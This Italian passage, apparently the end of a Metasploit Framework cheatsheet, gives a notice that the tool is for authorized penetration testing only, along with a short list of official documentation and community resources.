Avviso di sicurezza**: Metasploit Framework è un potente strumento di test di penetrazione che dovrebbe essere utilizzato solo su sistemi che possiedi o hanno un'autorizzazione scritta esplicita per testare. L'uso non autorizzato di questo strumento contro i sistemi che non possiedi è illegale e non etico. Assicurarsi sempre di avere una corretta autorizzazione prima di condurre qualsiasi attività di test di sicurezza. Questo cheatsheet è destinato a scopi educativi e test di sicurezza autorizzati. Gli utenti sono responsabili del rispetto di tutte le leggi e regolamenti applicabili nella loro giurisdizione.¶
Risorse aggiuntive**:¶
- Documentazione ufficiale del Metasploit
- Metasploit Unleashed Course
- [Comunità Rapid7]
- [Metasploit GitHub Repository]